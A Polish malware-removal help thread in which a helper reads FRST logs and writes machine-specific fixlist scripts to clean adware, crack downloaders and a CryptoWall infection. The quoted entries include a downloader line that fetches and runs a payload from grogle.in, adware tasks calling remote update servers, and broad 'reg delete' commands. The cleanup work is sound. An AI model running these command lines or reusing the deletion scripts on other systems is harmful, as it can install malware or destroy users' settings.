http://grogle.in/dat.bmp?data=UPc5bO93E9;Sony_Movie_Studio_Platinum_12.0.896_64-bit.exe;1423084229 & start cmd /R dat.bmp Task: {3C4A7BDA-9998-4792-A2CE-E1CD4F1C6A54} - System32\Tasks\{AFF18EBF-6EF0-470C-9825-CEA0CA7A31FF} => pcalua.exe -a "F:\@@@ MSDN\Visual Studio 2010 Professional Language Pack (x86) - (Polish)\HelpSetupLP_x86_plk.exe" -d "F:\@@@ MSDN\Visual Studio 2010 Professional Language Pack (x86) - (Polish)" HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" HKU\S-1-5-21-3689681616-363825201-3988283093-1000\...\Run: [AdobeBridge] => [X] FF user.js: detected! => C:\Users\Necron\AppData\Roaming\Mozilla\Firefox\Profiles\64afss3f.default\user.js [2015-03-31] FF Extension: vShare - C:\Users\Necron\AppData\Roaming\Mozilla\Firefox\Profiles\64afss3f.default\Extensions\vshare@toolbar [2013-08-14] S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X] CustomCLSID: HKU\S-1-5-21-3689681616-363825201-3988283093-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> E:\Program Files\3dsmax\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File CustomCLSID: HKU\S-1-5-21-3689681616-363825201-3988283093-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> E:\Program Files\3dsmax\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File CustomCLSID: HKU\S-1-5-21-3689681616-363825201-3988283093-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> E:\Program Files\3dsmax\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Advanced Warfare C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Foto2Avi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenRA C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SunAge Battle for Elysium Remastered C:\Windows\system32\*.tmp EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Są tu dwie sprawy: - Adware: W logu widać różne globalnie zainstalowane obiekty (Greener Web, HQ-V1.4, SavePass, WinZipper), a także adware w Operze, ale nic w Firefox. Prawdopodobnie w Firefox jest ten nowy typ adware, który posługuje się trikiem "domyślnych preferencji" i będę sprawdzać globalny folder Firefox ręcznie. - Uszkodzenie systemu Usług kryptograficznych - masowy odczyt braku podpisu cyfrowego usług i sterowników Windows. Działania wstępne: 1. Pod kątem usterki Usług kryptograficznych uruchom narzędzie Fix It 50202 (działa na XP): KLIK. Zaznacz tryb agresywny, który m.in. zawiera reset bazy catroot2. 2. Deinstalacje: - Przez Dodaj/Usuń programy odinstaluj adware HQ-V1.4, SavePass, WinZipper oraz starszą wersję Java 8 Update 31. - W Operze wejdź do Rozszerzeń i odinstaluj HQ-V1.4, SavePass. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Update Greener Web; C:\Program Files\Greener Web\updateGreenerWeb.exe [318752 2014-06-29] () R2 Util Greener Web; C:\Program Files\Greener Web\bin\utilGreenerWeb.exe [318752 2014-06-29] () S1 iSafeKrnlMon; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlMon.sys [X] S4 WindowsMangerProtect; C:\Documents and Settings\All Users\Application Data\WindowsMangerProtect\ProtectWindowsManager.exe [473088 2014-12-26] (Fuyu LIMITED) [File not signed] Task: C:\WINDOWS\Tasks\64e02fd5-38d4-4796-99b5-94f9ce61e8e9-1.job => C:\Program Files\SavePass\SavePass-codedownloader.exeE/lVhSU /rcbYrfph=task /ZpBCgxxtc='SavePass' /opKZNk=57050 /CjftjJ='001504' /JlFutVD='0' /xsGyTcGOL='0' /uEdfKzwvS=3C1D0284B59B46099EBF9B6E9B4DB9F7IE /TRIdwDGm=2a6fa4d6fca1f2f51cc66965dd418d08 /vxIZPlGJu=1_34_06_10 /vHvQAs=1.34.6.10 /nkaOBMRBi=1403270371 /YSZaXHc=http:/stats.datagenserv.com /hSYjiK=http:/errors.datagenserv.com /jpelGLu=http:/js.datagenserv.com /tQQrCEVl=opera /VLUYScLFK=http:/js.clientdemocloud.com /JKizC /bOpFcHBjn='{asw:[2, 12582980, 0]}' /JGGFP='http:/update.datagenserv.com/ie_code_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\64e02fd5-38d4-4796-99b5-94f9ce61e8e9-4.job => C:\Program Files\SavePass\64e02fd5-38d4-4796-99b5-94f9ce61e8e9-4.exeq/yiYpEh /ZpBCgxxtc='SavePass' /fekQtsK C:\Program Files\SavePass\57050.xpi' /opKZNk=57050 /CjftjJ='001504' /JlFutVD='0' /xsGyTcGOL='0' /uEdfKzwvS=3C1D0284B59B46099EBF9B6E9B4DB9F7IE /TRIdwDGm=2a6fa4d6fca1f2f51cc66965dd418d08 /vxIZPlGJu=1_34_06_10 /vHvQAs=1.34.6.10 /nkaOBMRBi=1403270371 /YSZaXHc=http:/stats.datagenserv.com /hSYjiK=http:/errors.datagenserv.com /jTZPGdj=300 /iHOqOSqX=587fea1b-1c76-43c0-8b29-3c3da78e2485@2309207e-4ba6-42d8-b8a2-3b0a22e052b5.com /CIoZrUwqh=0.94 /rWNAvk=a587fea1b1c7643c08b293c3da78e24852309207e4ba642d8b8a23b0a22e052b5com57050 /DSfhfiuz=https:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/57050.rdf /cIstfpesq='SavePass' /xpLdKr='Just Save!' /kRdSKzd='OutBrowse' /tQQrCEVl=opera /bOpFcHBjn='{asw:[2, 12582980, 0]}' /JKizC /SaWjDhp /eyWjDj /JGGFP='http:/update.datagenserv.com/ff_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\bench-sys.job => C:\Program Files\Bench\Updater\updater.exe Task: C:\WINDOWS\Tasks\bench-Updater removing.job => XN EG /verysilent SYSTEM This will uninstall Updater Task: C:\WINDOWS\Tasks\ffc1b485-31d9-46a5-a2fb-3de6a491d187-1.job => C:\Program Files\HQ-V1.4\HQ-V1.4-codedownloader.exe>/lVhSU /rcbYrfph=task /ZpBCgxxtc='HQ-V1.4' /opKZNk=58362 /CjftjJ='001553' /JlFutVD='0' /xsGyTcGOL='0' /uEdfKzwvS=9D5BD2C10EC341E3ADB65532CC207B80IE /TRIdwDGm=1c54ce95e4bfb8cc49a64f36322e09ee /vxIZPlGJu=1_34_06_10 /vHvQAs=1.34.6.10 /nkaOBMRBi=1403270331 /YSZaXHc=http:/stats.datagenserv.com /hSYjiK=http:/errors.datagenserv.com /jpelGLu=http:/js.datagenserv.com /tQQrCEVl=opera /VLUYScLFK=http:/js.clientdemocloud.com /JKizC /bOpFcHBjn='{asw:[2, 68, 0]}' /JGGFP='http:/update.datagenserv.com/ie_code_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\ffc1b485-31d9-46a5-a2fb-3de6a491d187-4.job => C:\Program Files\HQ-V1.4\ffc1b485-31d9-46a5-a2fb-3de6a491d187-4.exeŚ/yiYpEh /ZpBCgxxtc='HQ-V1.4' /fekQtsK C:\Program Files\HQ-V1.4\58362.xpi' /opKZNk=58362 /CjftjJ='001553' /JlFutVD='0' /xsGyTcGOL='0' /uEdfKzwvS=9D5BD2C10EC341E3ADB65532CC207B80IE /TRIdwDGm=1c54ce95e4bfb8cc49a64f36322e09ee /vxIZPlGJu=1_34_06_10 /vHvQAs=1.34.6.10 /nkaOBMRBi=1403270331 /YSZaXHc=http:/stats.datagenserv.com /hSYjiK=http:/errors.datagenserv.com /jTZPGdj=300 /iHOqOSqX=508d4e2f-a469-421d-a294-135dbb84fe1b@f7b17943-cc9e-4d4a-b223-0bd1e7cfc871.com /CIoZrUwqh=0.94 /rWNAvk=a508d4e2fa469421da294135dbb84fe1bf7b17943cc9e4d4ab2230bd1e7cfc871com58362 /DSfhfiuz=https:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/58362.rdf /cIstfpesq='HQ-V1.4' /xpLdKr='Turn YouTube videos to High Definition by default' /kRdSKzd='HQV1.4' /tQQrCEVl=opera /bOpFcHBjn='{asw:[2, 68, 0]}' /JKizC /SaWjDhp /eyWjDj /JGGFP='http:/update.datagenserv.com/ff_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\fun4us_notification_service.job => C:\Documents and Settings\User\Local Settings\Application Data\fun4us\fun4us_notification_service.exeâ/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='fun4us' /appid='73143' /srcid='2913' /bic='c3e994a2586ba8d7cc5eb266dcb010a6' /verifier='53dccb8e06c7bee9385adaae092f10fb' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif Task: C:\WINDOWS\Tasks\fun4us_updating_service.job => C:\Documents and Settings\User\Local Settings\Application Data\fun4us\fun4us_updating_service.exe§ /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=fun4us_updating_service /funurl=http:/stats.buildomserv.com HKLM\...\Run: [fst_pl_145] => [X] HKLM\...\Run: [upfst_pl_145.exe] => C:\Documents and Settings\User\Local Settings\Application Data\fst_pl_145\upfst_pl_145.exe -runhelper HKU\S-1-5-21-527237240-706699826-725345543-1003\...\MountPoints2: {90ed4f3f-8623-11e4-b085-001c231eb7f9} - E:\Startme.exe GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ShortcutWithArgument: C:\Documents and Settings\User\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX ShortcutWithArgument: C:\Documents and Settings\User\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX ShortcutWithArgument: C:\Documents and Settings\User\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.delta-homes.com/?type=hp&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?type=ds&ts=1403270212&from=obw&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.delta-homes.com/?type=hp&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?type=ds&ts=1403270212&from=obw&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX&q={searchTerms} HKU\S-1-5-21-527237240-706699826-725345543-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-527237240-706699826-725345543-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.delta-homes.com/?type=hp&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.delta-homes.com/web/?type=ds&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.delta-homes.com/web/?type=ds&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX&q={searchTerms} SearchScopes: HKU\S-1-5-21-527237240-706699826-725345543-1003 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.delta-homes.com/web/?type=ds&ts=1419843648&from=wpm12262&uid=HitachiXHTS541680J9SA00_SB22DBKGEB7B4NEB7B4NX&q={searchTerms} BHO: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll No File FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll No File FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll No File FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\delta-homes.xml [2014-12-29] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF HKLM\...\Firefox\Extensions: [detgdp@gmail.com] - C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\w4ibkb2u.default\extensions\detgdp@gmail.com CHR HKLM\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswwebrepchrome-sp.crx [2014-08-04] C:\Documents and Settings\All Users\Application Data\WindowsMangerProtect C:\Documents and Settings\User\Application Data\ColorTable C:\Documents and Settings\User\Application Data\i7OPoKuArNBT C:\Documents and Settings\User\Application Data\lTW1Bf6xfjnC C:\Documents and Settings\User\Local Settings\Application Data\fun4us C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome C:\Program Files\Greener Web C:\Program Files\WinZipper C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\system32\029B560A371F4E00AB32838EBC01B9E7 Folder: C:\Program Files\Mozilla Firefox Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins\@Microsoft.com/DownloadManager,version=1.1 /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Są tu dwa czynne konta: ==================== Accounts: ============================= Ania i Grześ (S-1-5-21-527237240-706699826-725345543-1006 - Limited - Enabled) => %SystemDrive%\Documents and Settings\Ania i Grześ User (S-1-5-21-527237240-706699826-725345543-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\User Potrzebne logi z obu. Po kolei zaloguj się na każde poprzez pełny restart komputera a nie opcje Wyloguj / Przełącz użytkownika, na każdym zrób zrób nowy log FRST z opcji Scan (zaznaczone pole Addition, by powstały dwa logi). Dołącz też plik fixlog.txt.

W starcie uruchamia się pakiet adware, poza tym w Firefox widać jawne rozszerzenie DiscountBomb. Adware wygląda na nabyte podczas próby poszukiwania cracków do programów Adobe i Autodesk - był na 100% uruchamiany "downloader" mający pobrać takie oto kwiatki: "Adobe Universal Patcher (Latest CC 2014) is Here", "Vray3-3dsMax2015v105-xf". Akcje do przeprowadzenia: 1. Odinstaluj stare wersje i zbędniki: Adobe Flash Player 10 ActiveX, Akamai NetSession Interface, Java 7 Update 45. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Startup: C:\Users\Czarny Żółty\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Universal Patcher (Latest CC 2014) is Here !!!.lnk Startup: C:\Users\Czarny Żółty\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vray3-3dsMax2015v105-xf.lnk Task: {E64F526C-B709-48C9-804D-D870A8B74224} - System32\Tasks\{3BD0A411-E7C8-420B-8BEE-9FC3CCA46232} => pcalua.exe -a "C:\Program Files (x86)\DiscountExt\DiscountExt.exe" -c /s /n /i:"ExecuteCommands;UninstallCommands" "" HKU\S-1-5-21-3574082868-2746565189-4072649035-1000\...\Policies\Explorer: [] S3 BCM42RLY; system32\drivers\BCM42RLY.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation) FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\.xml [2015-03-24] CustomCLSID: HKU\S-1-5-21-3574082868-2746565189-4072649035-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File CustomCLSID: HKU\S-1-5-21-3574082868-2746565189-4072649035-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File CustomCLSID: HKU\S-1-5-21-3574082868-2746565189-4072649035-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File C:\Program Files (x86)\DiscountExt C:\Program Files (x86)\SpaceOeffers C:\Program Files (x86)\Mozilla Firefox\plugins C:\Program Files (x86)\Temp C:\ProgramData\{6a95c574-7364-c509-6a95-5c57473615d1} C:\ProgramData\{a9ba9287-a79f-ddf0-a9ba-a9287a794a1e} C:\ProgramData\13298391940019829164 C:\Users\Czarny Żółty\AppData\Local\Temp-log.txt C:\Users\Czarny Żółty\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\DAEMON Tools Lite.lnk C:\Users\Czarny Żółty\AppData\Roaming\Microsoft\Word\Nowy%20Dokument%20programu%20Microsoft%20Word304382650080507976\Nowy%20Dokument%20programu%20Microsoft%20Word.docx.lnk Folder: C:\Program Files (x86)\Mozilla Firefox Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Czarny Żółty\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files (x86)\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wypowiedz się czy problemy nadal występują.

Podałeś niekompletny zestaw logów FRST - brak plików Addition i Shortcut. Nie można sprawdzić ani co jest zainstalowane, ani w pełni ocenić sytuacji. Poza tym, nazwa pliku FRST wskazuje, że wyciągasz log z folderu C:\FRST\Logs - to jest archiwum logów, bieżący log jest zawsze tam skąd uruchochamiano FRST, w tym przypadku: C:\Documents and Settings\q\Moje dokumenty\Downloads. Program SpyHunter to wątpliwy program, z daleka od niego. Niestety pliki HELP_DECRYPT* oznaczają infekcję CryptoWall, odszyfrowanie danych jest niemożliwe i moja ingerencja zostanie ograniczona tylko do usuwania infekcji per se oraz dodanych plików HELP_DECRYPT*. System jest ogólnie bardzo zainfekowany różnymi trojanami, a brak pliku Addition powoduje, że usuwanie może być niepełne podczas pierwszego podejścia. Wstępnie: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe HKLM\...\Run: [Generic Host Process] => [X] HKLM\...\Run: [jemaka] => C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\jemaka\jemaka.exe [425516 2015-04-06] (MercantileLegitimiseNeutralised) HKLM\...\Run: [NetworkInformer] => C:\Documents and Settings\q\Ustawienia lokalne\Temp\temp2934336138.exe [1575348 2015-04-10] () HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared Winlogon\Notify\dpasydb: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\dpasydb.dll () Winlogon\Notify\dpasysq: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\dpasysq.dll () Winlogon\Notify\hcxpipd: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\hcxpipd.dll () Winlogon\Notify\hcxtgtd: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\hcxtgtd.dll () Winlogon\Notify\hgacxpp: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\hgacxpp.dll () Winlogon\Notify\sydpasq: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\sydpasq.dll () Winlogon\Notify\tgtdyhn: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\tgtdyhn.dll () Winlogon\Notify\ysfvvsq: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\ysfvvsq.dll () Winlogon\Notify\ysvsqfv: C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\ysvsqfv.dll () HKLM\...\Policies\Explorer\Run: [jemaka] => C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\jemaka\jemaka.exe [425516 2015-04-06] ( (MercantileLegitimiseNeutralised)) HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [hgacxpp] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\hgacxpp.dll",hgacxpp HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [hcxpipd] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\hcxpipd.dll",hcxpipd HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [hcxtgtd] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\hcxtgtd.dll",hcxtgtd HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [tgtdyhn] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\tgtdyhn.dll",tgtdyhn HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [dpasydb] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\dpasydb.dll",dpasydb HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [sydpasq] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\sydpasq.dll",sydpasq HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [dpasysq] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\dpasysq.dll",dpasysq HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [ysfvvsq] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\ysfvvsq.dll",ysfvvsq HKU\S-1-5-21-1085031214-2025429265-725345543-1003\...\Run: [ysvsqfv] => rundll32 "C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\ysvsqfv.dll",ysvsqfv HKU\S-1-5-21-1085031214-2025429265-725345543-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> none ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Dane aplikacji\GG\ggdrive\ggdrive-overlay.dll No File ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Dane aplikacji\GG\ggdrive\ggdrive-overlay.dll No File ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Dane aplikacji\GG\ggdrive\ggdrive-overlay.dll No File ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\Documents and Settings\All Users\Dane aplikacji\GG\ggdrive\ggdrive-overlay.dll No File BootExecute: autocheck autochk * sdnclean.exe GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HKU\S-1-5-21-1085031214-2025429265-725345543-1003\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/?trackid=sp-006 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.google.com/search?trackid=sp-006&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-1085031214-2025429265-725345543-1003\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.google.com/search?trackid=sp-006&q={searchTerms} HKU\S-1-5-21-1085031214-2025429265-725345543-1003\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.google.com/?trackid=sp-006 HKU\S-1-5-21-1085031214-2025429265-725345543-1003\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = https://www.google.com/?trackid=sp-006 HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "about:newtab" HKU\S-1-5-21-1085031214-2025429265-725345543-1003\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "about:newtab" SearchScopes: HKLM -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = https://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-1085031214-2025429265-725345543-1003 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL = SearchScopes: HKU\S-1-5-21-1085031214-2025429265-725345543-1003 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = https://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-1085031214-2025429265-725345543-1003 -> {szukaj.gazeta.pl} URL = http://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms} BHO: AcroIEHlprObj Class -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx No File BHO: Java(tm) Plug-In SSV Helper 